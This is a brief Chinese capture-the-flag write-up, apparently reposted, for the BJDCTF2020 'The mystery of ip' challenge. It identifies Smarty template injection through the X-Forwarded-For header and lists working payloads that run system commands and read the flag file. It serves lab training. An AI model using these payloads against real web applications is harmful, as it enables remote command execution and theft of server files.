[BJDCTF2020]The mystery of ip
Posted mech
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[BJDCTF2020]The mystery of ip相关的知识,希望对你有一定的参考价值。
知识点
- SSTI
- smarty
抓包,根据题目猜想X-Forwarded-For处可能有问题,测试了一下,存在模板注入
测试了一下,是smarty注入
smarty注入payload
{if phpinfo()}{/if}
{if system(‘ls‘)}{/if}
{ readfile(‘/flag‘) }
{if show_source(‘/flag‘)}{/if}
{if system(‘cat ../../../flag‘)}{/if} #本题payload
flag.php是假的,真正的flag在根目录下的flag文件中
以上是关于[BJDCTF2020]The mystery of ip的主要内容,如果未能解决你的问题,请参考以下文章